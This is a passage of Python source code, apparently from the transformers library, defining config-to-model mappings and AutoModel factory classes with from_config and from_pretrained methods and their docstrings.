(ProphetNetConfig, ProphetNetForConditionalGeneration),
]
)
MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING = OrderedDict(
[
# Model for Sequence Classification mapping
(DistilBertConfig, DistilBertForSequenceClassification),
(AlbertConfig, AlbertForSequenceClassification),
(CamembertConfig, CamembertForSequenceClassification),
(XLMRobertaConfig, XLMRobertaForSequenceClassification),
(BartConfig, BartForSequenceClassification),
(LongformerConfig, LongformerForSequenceClassification),
(RobertaConfig, RobertaForSequenceClassification),
(SqueezeBertConfig, SqueezeBertForSequenceClassification),
(BertConfig, BertForSequenceClassification),
(XLNetConfig, XLNetForSequenceClassification),
(MobileBertConfig, MobileBertForSequenceClassification),
(FlaubertConfig, FlaubertForSequenceClassification),
(XLMConfig, XLMForSequenceClassification),
(ElectraConfig, ElectraForSequenceClassification),
(FunnelConfig, FunnelForSequenceClassification),
(DebertaConfig, DebertaForSequenceClassification),
(GPT2Config, GPT2ForSequenceClassification),
(OpenAIGPTConfig, OpenAIGPTForSequenceClassification),
(ReformerConfig, ReformerForSequenceClassification),
]
)
MODEL_FOR_QUESTION_ANSWERING_MAPPING = OrderedDict(
[
# Model for Question Answering mapping
(DistilBertConfig, DistilBertForQuestionAnswering),
(AlbertConfig, AlbertForQuestionAnswering),
(CamembertConfig, CamembertForQuestionAnswering),
(BartConfig, BartForQuestionAnswering),
(LongformerConfig, LongformerForQuestionAnswering),
(XLMRobertaConfig, XLMRobertaForQuestionAnswering),
(RobertaConfig, RobertaForQuestionAnswering),
(SqueezeBertConfig, SqueezeBertForQuestionAnswering),
(BertConfig, BertForQuestionAnswering),
(XLNetConfig, XLNetForQuestionAnsweringSimple),
(FlaubertConfig, FlaubertForQuestionAnsweringSimple),
(MobileBertConfig, MobileBertForQuestionAnswering),
(XLMConfig, XLMForQuestionAnsweringSimple),
(ElectraConfig, ElectraForQuestionAnswering),
(ReformerConfig, ReformerForQuestionAnswering),
(FunnelConfig, FunnelForQuestionAnswering),
(LxmertConfig, LxmertForQuestionAnswering),
]
)
MODEL_FOR_TOKEN_CLASSIFICATION_MAPPING = OrderedDict(
[
# Model for Token Classification mapping
(LayoutLMConfig, LayoutLMForTokenClassification),
(DistilBertConfig, DistilBertForTokenClassification),
(CamembertConfig, CamembertForTokenClassification),
(FlaubertConfig, FlaubertForTokenClassification),
(XLMConfig, XLMForTokenClassification),
(XLMRobertaConfig, XLMRobertaForTokenClassification),
(LongformerConfig, LongformerForTokenClassification),
(RobertaConfig, RobertaForTokenClassification),
(SqueezeBertConfig, SqueezeBertForTokenClassification),
(BertConfig, BertForTokenClassification),
(MobileBertConfig, MobileBertForTokenClassification),
(XLNetConfig, XLNetForTokenClassification),
(AlbertConfig, AlbertForTokenClassification),
(ElectraConfig, ElectraForTokenClassification),
(FlaubertConfig, FlaubertForTokenClassification),
(FunnelConfig, FunnelForTokenClassification),
]
)
MODEL_FOR_MULTIPLE_CHOICE_MAPPING = OrderedDict(
[
# Model for Multiple Choice mapping
(CamembertConfig, CamembertForMultipleChoice),
(ElectraConfig, ElectraForMultipleChoice),
(XLMRobertaConfig, XLMRobertaForMultipleChoice),
(LongformerConfig, LongformerForMultipleChoice),
(RobertaConfig, RobertaForMultipleChoice),
(SqueezeBertConfig, SqueezeBertForMultipleChoice),
(BertConfig, BertForMultipleChoice),
(DistilBertConfig, DistilBertForMultipleChoice),
(MobileBertConfig, MobileBertForMultipleChoice),
(XLNetConfig, XLNetForMultipleChoice),
(AlbertConfig, AlbertForMultipleChoice),
(XLMConfig, XLMForMultipleChoice),
(FlaubertConfig, FlaubertForMultipleChoice),
(FunnelConfig, FunnelForMultipleChoice),
]
)
MODEL_FOR_NEXT_SENTENCE_PREDICTION_MAPPING = OrderedDict(
[
(BertConfig, BertForNextSentencePrediction),
(MobileBertConfig, MobileBertForNextSentencePrediction),
]
)
AUTO_MODEL_PRETRAINED_DOCSTRING = r"""
The model class to instantiate is selected based on the :obj:`model_type` property of the config object (either
passed as an argument or loaded from :obj:`pretrained_model_name_or_path` if possible), or when it's missing,
by falling back to using pattern matching on :obj:`pretrained_model_name_or_path`:
List options
The model is set in evaluation mode by default using ``model.eval()`` (so for instance, dropout modules are
deactivated). To train the model, you should first set it back in training mode with ``model.train()``
Args:
pretrained_model_name_or_path:
Can be either:
- A string, the `model id` of a pretrained model hosted inside a model repo on huggingface.co.
Valid model ids can be located at the root-level, like ``bert-base-uncased``, or namespaced under
a user or organization name, like ``dbmdz/bert-base-german-cased``.
- A path to a `directory` containing model weights saved using
:func:`~transformers.PreTrainedModel.save_pretrained`, e.g., ``./my_model_directory/``.
- A path or url to a `tensorflow index checkpoint file` (e.g, ``./tf_model/model.ckpt.index``). In
this case, ``from_tf`` should be set to :obj:`True` and a configuration object should be provided
as ``config`` argument. This loading path is slower than converting the TensorFlow checkpoint in
a PyTorch model using the provided conversion scripts and loading the PyTorch model afterwards.
model_args (additional positional arguments, `optional`):
Will be passed along to the underlying model ``__init__()`` method.
config (:class:`~transformers.PretrainedConfig`, `optional`):
Configuration for the model to use instead of an automatically loaded configuration. Configuration can
be automatically loaded when:
- The model is a model provided by the library (loaded with the `model id` string of a pretrained
model).
- The model was saved using :meth:`~transformers.PreTrainedModel.save_pretrained` and is reloaded
by supplying the save directory.
- The model is loaded by supplying a local directory as ``pretrained_model_name_or_path`` and a
configuration JSON file named `config.json` is found in the directory.
state_dict (`Dict[str, torch.Tensor]`, `optional`):
A state dictionary to use instead of a state dictionary loaded from saved weights file.
This option can be used if you want to create a model from a pretrained configuration but load your own
weights. In this case though, you should check if using
:func:`~transformers.PreTrainedModel.save_pretrained` and
:func:`~transformers.PreTrainedModel.from_pretrained` is not a simpler option.
cache_dir (:obj:`str`, `optional`):
Path to a directory in which a downloaded pretrained model configuration should be cached if the
standard cache should not be used.
from_tf (:obj:`bool`, `optional`, defaults to :obj:`False`):
Load the model weights from a TensorFlow checkpoint save file (see docstring of
``pretrained_model_name_or_path`` argument).
force_download (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not to force the (re-)download of the model weights and configuration files, overriding the
cached versions if they exist.
resume_download (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not to delete incompletely received files. Will attempt to resume the download if such a
file exists.
proxies (:obj:`Dict[str, str], `optional`):
A dictionary of proxy servers to use by protocol or endpoint, e.g., :obj:`{'http': 'foo.bar:3128',
'http://hostname': 'foo.bar:4012'}`. The proxies are used on each request.
output_loading_info(:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether ot not to also return a dictionary containing missing keys, unexpected keys and error messages.
local_files_only(:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not to only look at local files (e.g., not try downloading the model).
revision(:obj:`str`, `optional`, defaults to :obj:`"main"`):
The specific model version to use. It can be a branch name, a tag name, or a commit id, since we use a
git-based system for storing models and other artifacts on huggingface.co, so ``revision`` can be any
identifier allowed by git.
kwargs (additional keyword arguments, `optional`):
Can be used to update the configuration object (after it being loaded) and initiate the model (e.g.,
:obj:`output_attentions=True`). Behaves differently depending on whether a ``config`` is provided or
automatically loaded:
- If a configuration is provided with ``config``, ``**kwargs`` will be directly passed to the
underlying model's ``__init__`` method (we assume all relevant updates to the configuration have
already been done)
- If a configuration is not provided, ``kwargs`` will be first passed to the configuration class
initialization function (:func:`~transformers.PretrainedConfig.from_pretrained`). Each key of
``kwargs`` that corresponds to a configuration attribute will be used to override said attribute
with the supplied ``kwargs`` value. Remaining keys that do not correspond to any configuration
attribute will be passed to the underlying model's ``__init__`` function.
"""
class AutoModel:
r"""
This is a generic model class that will be instantiated as one of the base model classes of the library when
created with the :meth:`~transformers.AutoModel.from_pretrained` class method or the
:meth:`~transformers.AutoModel.from_config` class methods.
This class cannot be instantiated directly using ``__init__()`` (throws an error).
"""
def __init__(self):
raise EnvironmentError(
"AutoModel is designed to be instantiated "
"using the `AutoModel.from_pretrained(pretrained_model_name_or_path)` or "
"`AutoModel.from_config(config)` methods."
)
@classmethod
@replace_list_option_in_docstrings(MODEL_MAPPING, use_model_types=False)
def from_config(cls, config):
r"""
Instantiates one of the base model classes of the library from a configuration.
Note:
Loading a model from its configuration file does **not** load the model weights. It only affects the
model's configuration. Use :meth:`~transformers.AutoModel.from_pretrained` to load the model weights.
Args:
config (:class:`~transformers.PretrainedConfig`):
The model class to instantiate is selected based on the configuration class:
List options
Examples::
>>> from transformers import AutoConfig, AutoModel
>>> # Download configuration from huggingface.co and cache.
>>> config = AutoConfig.from_pretrained('bert-base-uncased')
>>> model = AutoModel.from_config(config)
"""
if type(config) in MODEL_MAPPING.keys():
return MODEL_MAPPING[type(config)](config)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__, cls.__name__, ", ".join(c.__name__ for c in MODEL_MAPPING.keys())
)
)
@classmethod
@replace_list_option_in_docstrings(MODEL_MAPPING)
@add_start_docstrings(
"Instantiate one of the base model classes of the library from a pretrained model.",
AUTO_MODEL_PRETRAINED_DOCSTRING,
)
def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
r"""
Examples::
>>> from transformers import AutoConfig, AutoModel
>>> # Download model and configuration from huggingface.co and cache.
>>> model = AutoModel.from_pretrained('bert-base-uncased')
>>> # Update configuration during loading
>>> model = AutoModel.from_pretrained('bert-base-uncased', output_attentions=True)
>>> model.config.output_attentions
True
>>> # Loading from a TF checkpoint file instead of a PyTorch model (slower)
>>> config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')
>>> model = AutoModel.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)
"""
config = kwargs.pop("config", None)
if not isinstance(config, PretrainedConfig):
config, kwargs = AutoConfig.from_pretrained(
pretrained_model_name_or_path, return_unused_kwargs=True, **kwargs
)
if type(config) in MODEL_MAPPING.keys():
return MODEL_MAPPING[type(config)].from_pretrained(
pretrained_model_name_or_path, *model_args, config=config, **kwargs
)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__, cls.__name__, ", ".join(c.__name__ for c in MODEL_MAPPING.keys())
)
)
class AutoModelForPreTraining:
r"""
This is a generic model class that will be instantiated as one of the model classes of the library---with the
architecture used for pretraining this model---when created with the when created with the
:meth:`~transformers.AutoModelForPreTraining.from_pretrained` class method or the
:meth:`~transformers.AutoModelForPreTraining.from_config` class method.
This class cannot be instantiated directly using ``__init__()`` (throws an error).
"""
def __init__(self):
raise EnvironmentError(
"AutoModelForPreTraining is designed to be instantiated "
"using the `AutoModelForPreTraining.from_pretrained(pretrained_model_name_or_path)` or "
"`AutoModelForPreTraining.from_config(config)` methods."
)
@classmethod
@replace_list_option_in_docstrings(MODEL_FOR_PRETRAINING_MAPPING, use_model_types=False)
def from_config(cls, config):
r"""
Instantiates one of the model classes of the library---with the architecture used for pretraining this
model---from a configuration.
Note:
Loading a model from its configuration file does **not** load the model weights. It only affects the
model's configuration. Use :meth:`~transformers.AutoModelForPreTraining.from_pretrained` to load the model
weights.
Args:
config (:class:`~transformers.PretrainedConfig`):
The model class to instantiate is selected based on the configuration class:
List options
Examples::
>>> from transformers import AutoConfig, AutoModelForPreTraining
>>> # Download configuration from huggingface.co and cache.
>>> config = AutoConfig.from_pretrained('bert-base-uncased')
>>> model = AutoModelForPreTraining.from_config(config)
"""
if type(config) in MODEL_FOR_PRETRAINING_MAPPING.keys():
return MODEL_FOR_PRETRAINING_MAPPING[type(config)](config)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__, cls.__name__, ", ".join(c.__name__ for c in MODEL_FOR_PRETRAINING_MAPPING.keys())
)
)
@classmethod
@replace_list_option_in_docstrings(MODEL_FOR_PRETRAINING_MAPPING)
@add_start_docstrings(
"Instantiate one of the model classes of the library---with the architecture used for pretraining this ",
"model---from a pretrained model.",
AUTO_MODEL_PRETRAINED_DOCSTRING,
)
def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
r"""
Examples::
>>> from transformers import AutoConfig, AutoModelForPreTraining
>>> # Download model and configuration from huggingface.co and cache.
>>> model = AutoModelForPreTraining.from_pretrained('bert-base-uncased')
>>> # Update configuration during loading
>>> model = AutoModelForPreTraining.from_pretrained('bert-base-uncased', output_attentions=True)
>>> model.config.output_attentions
True
>>> # Loading from a TF checkpoint file instead of a PyTorch model (slower)
>>> config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')
>>> model = AutoModelForPreTraining.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)
"""
config = kwargs.pop("config", None)
if not isinstance(config, PretrainedConfig):
config, kwargs = AutoConfig.from_pretrained(
pretrained_model_name_or_path, return_unused_kwargs=True, **kwargs
)
if type(config) in MODEL_FOR_PRETRAINING_MAPPING.keys():
return MODEL_FOR_PRETRAINING_MAPPING[type(config)].from_pretrained(
pretrained_model_name_or_path, *model_args, config=config, **kwargs
)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__, cls.__name__, ", ".join(c.__name__ for c in MODEL_FOR_PRETRAINING_MAPPING.keys())
)
)
class AutoModelWithLMHead:
r"""
This is a generic model class that will be instantiated as one of the model classes of the library---with a
language modeling head---when created with the when created with the
:meth:`~transformers.AutoModelWithLMHead.from_pretrained` class method or the
:meth:`~transformers.AutoModelWithLMHead.from_config` class method.
This class cannot be instantiated directly using ``__init__()`` (throws an error).
.. warning::
This class is deprecated and will be removed in a future version. Please use
:class:`~transformers.AutoModelForCausalLM` for causal language models,
:class:`~transformers.AutoModelForMaskedLM` for masked language models and
:class:`~transformers.AutoModelForSeq2SeqLM` for encoder-decoder models.
"""
def __init__(self):
raise EnvironmentError(
"AutoModelWithLMHead is designed to be instantiated "
"using the `AutoModelWithLMHead.from_pretrained(pretrained_model_name_or_path)` or "
"`AutoModelWithLMHead.from_config(config)` methods."
)
@classmethod
@replace_list_option_in_docstrings(MODEL_WITH_LM_HEAD_MAPPING, use_model_types=False)
def from_config(cls, config):
r"""
Instantiates one of the model classes of the library---with a language modeling head---from a configuration.
Note:
Loading a model from its configuration file does **not** load the model weights. It only affects the
model's configuration. Use :meth:`~transformers.AutoModelWithLMHead.from_pretrained` to load the model
weights.
Args:
config (:class:`~transformers.PretrainedConfig`):
The model class to instantiate is selected based on the configuration class:
List options
Examples::
>>> from transformers import AutoConfig, AutoModelWithLMHead
>>> # Download configuration from huggingface.co and cache.
>>> config = AutoConfig.from_pretrained('bert-base-uncased')
>>> model = AutoModelWithLMHead.from_config(config)
"""
warnings.warn(
"The class `AutoModelWithLMHead` is deprecated and will be removed in a future version. Please use "
"`AutoModelForCausalLM` for causal language models, `AutoModelForMaskedLM` for masked language models and "
"`AutoModelForSeq2SeqLM` for encoder-decoder models.",
FutureWarning,
)
if type(config) in MODEL_WITH_LM_HEAD_MAPPING.keys():
return MODEL_WITH_LM_HEAD_MAPPING[type(config)](config)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__, cls.__name__, ", ".join(c.__name__ for c in MODEL_WITH_LM_HEAD_MAPPING.keys())
)
)
@classmethod
@replace_list_option_in_docstrings(MODEL_WITH_LM_HEAD_MAPPING)
@add_start_docstrings(
"Instantiate one of the model classes of the library---with a language modeling head---from a pretrained ",
"model.",
AUTO_MODEL_PRETRAINED_DOCSTRING,
)
def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
r"""
Examples::
>>> from transformers import AutoConfig, AutoModelWithLMHead
>>> # Download model and configuration from huggingface.co and cache.
>>> model = AutoModelWithLMHead.from_pretrained('bert-base-uncased')
>>> # Update configuration during loading
>>> model = AutoModelWithLMHead.from_pretrained('bert-base-uncased', output_attentions=True)
>>> model.config.output_attentions
True
>>> # Loading from a TF checkpoint file instead of a PyTorch model (slower)
>>> config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')
>>> model = AutoModelWithLMHead.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)
"""
warnings.warn(
"The class `AutoModelWithLMHead` is deprecated and will be removed in a future version. Please use "
"`AutoModelForCausalLM` for causal language models, `AutoModelForMaskedLM` for masked language models and "
"`AutoModelForSeq2SeqLM` for encoder-decoder models.",
FutureWarning,
)
config = kwargs.pop("config", None)
if not isinstance(config, PretrainedConfig):
config, kwargs = AutoConfig.from_pretrained(
pretrained_model_name_or_path, return_unused_kwargs=True, **kwargs
)
if type(config) in MODEL_WITH_LM_HEAD_MAPPING.keys():
return MODEL_WITH_LM_HEAD_MAPPING[type(config)].from_pretrained(
pretrained_model_name_or_path, *model_args, config=config, **kwargs
)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__, cls.__name__, ", ".join(c.__name__ for c in MODEL_WITH_LM_HEAD_MAPPING.keys())
)
)
class AutoModelForCausalLM:
r"""
This is a generic model class that will be instantiated as one of the model classes of the library---with a causal
language modeling head---when created with the when created with the
:meth:`~transformers.AutoModelForCausalLM.from_pretrained` class method or the
:meth:`~transformers.AutoModelForCausalLM.from_config` class method.
This class cannot be instantiated directly using ``__init__()`` (throws an error).
"""
def __init__(self):
raise EnvironmentError(
"AutoModelForCausalLM is designed to be instantiated "
"using the `AutoModelForCausalLM.from_pretrained(pretrained_model_name_or_path)` or "
"`AutoModelForCausalLM.from_config(config)` methods."
)
@classmethod
@replace_list_option_in_docstrings(MODEL_FOR_CAUSAL_LM_MAPPING, use_model_types=False)
def from_config(cls, config):
r"""
Instantiates one of the model classes of the library---with a causal language modeling head---from a
configuration.
Note:
Loading a model from its configuration file does **not** load the model weights. It only affects the
model's configuration. Use :meth:`~transformers.AutoModelForCausalLM.from_pretrained` to load the model
weights.
Args:
config (:class:`~transformers.PretrainedConfig`):
The model class to instantiate is selected based on the configuration class:
List options
Examples::
>>> from transformers import AutoConfig, AutoModelForCausalLM
>>> # Download configuration from huggingface.co and cache.
>>> config = AutoConfig.from_pretrained('gpt2')
>>> model = AutoModelForCausalLM.from_config(config)
"""
if type(config) in MODEL_FOR_CAUSAL_LM_MAPPING.keys():
return MODEL_FOR_CAUSAL_LM_MAPPING[type(config)](config)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__, cls.__name__, ", ".join(c.__name__ for c in MODEL_FOR_CAUSAL_LM_MAPPING.keys())
)
)
@classmethod
@replace_list_option_in_docstrings(MODEL_FOR_CAUSAL_LM_MAPPING)
@add_start_docstrings(
"Instantiate one of the model classes of the library---with a causal language modeling head---from a "
"pretrained model.",
AUTO_MODEL_PRETRAINED_DOCSTRING,
)
def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
r"""
Examples::
>>> from transformers import AutoConfig, AutoModelForCausalLM
>>> # Download model and configuration from huggingface.co and cache.
>>> model = AutoModelForCausalLM.from_pretrained('gpt2')
>>> # Update configuration during loading
>>> model = AutoModelForCausalLM.from_pretrained('gpt2', output_attentions=True)
>>> model.config.output_attentions
True
>>> # Loading from a TF checkpoint file instead of a PyTorch model (slower)
>>> config = AutoConfig.from_json_file('./tf_model/gpt2_tf_model_config.json')
>>> model = AutoModelForCausalLM.from_pretrained('./tf_model/gpt2_tf_checkpoint.ckpt.index', from_tf=True, config=config)
"""
config = kwargs.pop("config", None)
if not isinstance(config, PretrainedConfig):
config, kwargs = AutoConfig.from_pretrained(
pretrained_model_name_or_path, return_unused_kwargs=True, **kwargs
)
if type(config) in MODEL_FOR_CAUSAL_LM_MAPPING.keys():
return MODEL_FOR_CAUSAL_LM_MAPPING[type(config)].from_pretrained(
pretrained_model_name_or_path, *model_args, config=config, **kwargs
)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__, cls.__name__, ", ".join(c.__name__ for c in MODEL_FOR_CAUSAL_LM_MAPPING.keys())
)
)
class AutoModelForMaskedLM:
r"""
This is a generic model class that will be instantiated as one of the model classes of the library---with a masked
language modeling head---when created with the when created with the
:meth:`~transformers.AutoModelForMaskedLM.from_pretrained` class method or the
:meth:`~transformers.AutoModelForMaskedLM.from_config` class method.
This class cannot be instantiated directly using ``__init__()`` (throws an error).
"""
def __init__(self):
raise EnvironmentError(
"AutoModelForMaskedLM is designed to be instantiated "
"using the `AutoModelForMaskedLM.from_pretrained(pretrained_model_name_or_path)` or "
"`AutoModelForMaskedLM.from_config(config)` methods."
)
@classmethod
@replace_list_option_in_docstrings(MODEL_FOR_MASKED_LM_MAPPING, use_model_types=False)
def from_config(cls, config):
r"""
Instantiates one of the model classes of the library---with a masked language modeling head---from a
configuration.
Note:
Loading a model from its configuration file does **not** load the model weights. It only affects the
model's configuration. Use :meth:`~transformers.AutoModelForMaskedLM.from_pretrained` to load the model
weights.
Args:
config (:class:`~transformers.PretrainedConfig`):
The model class to instantiate is selected based on the configuration class:
List options
Examples::
>>> from transformers import AutoConfig, AutoModelForMaskedLM
>>> # Download configuration from huggingface.co and cache.
>>> config = AutoConfig.from_pretrained('bert-base-uncased')
>>> model = AutoModelForMaskedLM.from_config(config)
"""
if type(config) in MODEL_FOR_MASKED_LM_MAPPING.keys():
return MODEL_FOR_MASKED_LM_MAPPING[type(config)](config)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__, cls.__name__, ", ".join(c.__name__ for c in MODEL_FOR_MASKED_LM_MAPPING.keys())
)
)
@classmethod
@replace_list_option_in_docstrings(MODEL_FOR_MASKED_LM_MAPPING)
@add_start_docstrings(
"Instantiate one of the model classes of the library---with a masked language modeling head---from a "
"pretrained model.",
AUTO_MODEL_PRETRAINED_DOCSTRING,
)
def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
r"""
Examples::
>>> from transformers import AutoConfig, AutoModelForMaskedLM
>>> # Download model and configuration from huggingface.co and cache.
>>> model = AutoModelForMaskedLM.from_pretrained('bert-base-uncased')
>>> # Update configuration during loading
>>> model = AutoModelForMaskedLM.from_pretrained('bert-base-uncased', output_attentions=True)
>>> model.config.output_attentions
True
>>> # Loading from a TF checkpoint file instead of a PyTorch model (slower)
>>> config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')
>>> model = AutoModelForMaskedLM.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)
"""
config = kwargs.pop("config", None)
if not isinstance(config, PretrainedConfig):
config, kwargs = AutoConfig.from_pretrained(
pretrained_model_name_or_path, return_unused_kwargs=True, **kwargs
)
if type(config) in MODEL_FOR_MASKED_LM_MAPPING.keys():
return MODEL_FOR_MASKED_LM_MAPPING[type(config)].from_pretrained(
pretrained_model_name_or_path, *model_args, config=config, **kwargs
)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__, cls.__name__, ", ".join(c.__name__ for c in MODEL_FOR_MASKED_LM_MAPPING.keys())
)
)
class AutoModelForSeq2SeqLM:
r"""
This is a generic model class that will be instantiated as one of the model classes of the library---with a
sequence-to-sequence language modeling head---when created with the when created with the
:meth:`~transformers.AutoModelForSeq2SeqLM.from_pretrained` class method or the
:meth:`~transformers.AutoModelForSeq2SeqLM.from_config` class method.
This class cannot be instantiated directly using ``__init__()`` (throws an error).
"""
def __init__(self):
raise EnvironmentError(
"AutoModelForSeq2SeqLM is designed to be instantiated "
"using the `AutoModelForSeq2SeqLM.from_pretrained(pretrained_model_name_or_path)` or "
"`AutoModelForSeq2SeqLM.from_config(config)` methods."
)
@classmethod
@replace_list_option_in_docstrings(MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING, use_model_types=False)
def from_config(cls, config):
r"""
Instantiates one of the model classes of the library---with a sequence-to-sequence language modeling
head---from a configuration.
Note:
Loading a model from its configuration file does **not** load the model weights. It only affects the
model's configuration. Use :meth:`~transformers.AutoModelForSeq2SeqLM.from_pretrained` to load the model
weights.
Args:
config (:class:`~transformers.PretrainedConfig`):
The model class to instantiate is selected based on the configuration class:
List options
Examples::
>>> from transformers import AutoConfig, AutoModelForSeq2SeqLM
>>> # Download configuration from huggingface.co and cache.
>>> config = AutoConfig.from_pretrained('t5')
>>> model = AutoModelForSeq2SeqLM.from_config(config)
"""
if type(config) in MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING.keys():
return MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING[type(config)](config)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__,
cls.__name__,
", ".join(c.__name__ for c in MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING.keys()),
)
)
@classmethod
@replace_list_option_in_docstrings(MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING)
@add_start_docstrings(
"Instantiate one of the model classes of the library---with a sequence-to-sequence language modeling "
"head---from a pretrained model.",
AUTO_MODEL_PRETRAINED_DOCSTRING,
)
def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
r"""
Examples::
>>> from transformers import AutoConfig, AutoModelForSeq2SeqLM
>>> # Download model and configuration from huggingface.co and cache.
>>> model = AutoModelForSeq2SeqLM.from_pretrained('t5-base')
>>> # Update configuration during loading
>>> model = AutoModelForSeq2SeqLM.from_pretrained('t5-base', output_attentions=True)
>>> model.config.output_attentions
True
>>> # Loading from a TF checkpoint file instead of a PyTorch model (slower)
>>> config = AutoConfig.from_json_file('./tf_model/t5_tf_model_config.json')
>>> model = AutoModelForSeq2SeqLM.from_pretrained('./tf_model/t5_tf_checkpoint.ckpt.index', from_tf=True, config=config)
"""
config = kwargs.pop("config", None)
if not isinstance(config, PretrainedConfig):
config, kwargs = AutoConfig.from_pretrained(
pretrained_model_name_or_path, return_unused_kwargs=True, **kwargs
)
if type(config) in MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING.keys():
return MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING[type(config)].from_pretrained(
pretrained_model_name_or_path, *model_args, config=config, **kwargs
)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__,
cls.__name__,
", ".join(c.__name__ for c in MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING.keys()),
)
)
class AutoModelForSequenceClassification:
r"""
This is a generic model class that will be instantiated as one of the model classes of the library---with a
sequence classification head---when created with the when created with the
:meth:`~transformers.AutoModelForSequenceClassification.from_pretrained` class method or the
:meth:`~transformers.AutoModelForSequenceClassification.from_config` class method.
This class cannot be instantiated directly using ``__init__()`` (throws an error).
"""
def __init__(self):
raise EnvironmentError(
"AutoModelForSequenceClassification is designed to be instantiated "
"using the `AutoModelForSequenceClassification.from_pretrained(pretrained_model_name_or_path)` or "
"`AutoModelForSequenceClassification.from_config(config)` methods."
)
@classmethod
@replace_list_option_in_docstrings(MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING, use_model_types=False)
def from_config(cls, config):
r"""
Instantiates one of the model classes of the library---with a sequence classification head---from a
configuration.
Note:
Loading a model from its configuration file does **not** load the model weights. It only affects the
model's configuration. Use :meth:`~transformers.AutoModelForSequenceClassification.from_pretrained` to load
the model weights.
Args:
config (:class:`~transformers.PretrainedConfig`):
The model class to instantiate is selected based on the configuration class:
List options
Examples::
>>> from transformers import AutoConfig, AutoModelForSequenceClassification
>>> # Download configuration from huggingface.co and cache.
>>> config = AutoConfig.from_pretrained('bert-base-uncased')
>>> model = AutoModelForSequenceClassification.from_config(config)
"""
if type(config) in MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING.keys():
return MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING[type(config)](config)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__,
cls.__name__,
", ".join(c.__name__ for c in MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING.keys()),
)
)
@classmethod
@replace_list_option_in_docstrings(MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING)
@add_start_docstrings(
"Instantiate one of the model classes of the library---with a sequence classification head---from a "
"pretrained model.",
AUTO_MODEL_PRETRAINED_DOCSTRING,
)
def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
r"""
Examples::
>>> from transformers import AutoConfig, AutoModelForSequenceClassification
>>> # Download model and configuration from huggingface.co and cache.
>>> model = AutoModelForSequenceClassification.from_pretrained('bert-base-uncased')
>>> # Update configuration during loading
>>> model = AutoModelForSequenceClassification.from_pretrained('bert-base-uncased', output_attentions=True)
>>> model.config.output_attentions
True
>>> # Loading from a TF checkpoint file instead of a PyTorch model (slower)
>>> config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')
>>> model = AutoModelForSequenceClassification.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)
"""
config = kwargs.pop("config", None)
if not isinstance(config, PretrainedConfig):
config, kwargs = AutoConfig.from_pretrained(
pretrained_model_name_or_path, return_unused_kwargs=True, **kwargs
)
if type(config) in MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING.keys():
return MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING[type(config)].from_pretrained(
pretrained_model_name_or_path, *model_args, config=config, **kwargs
)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__,
cls.__name__,
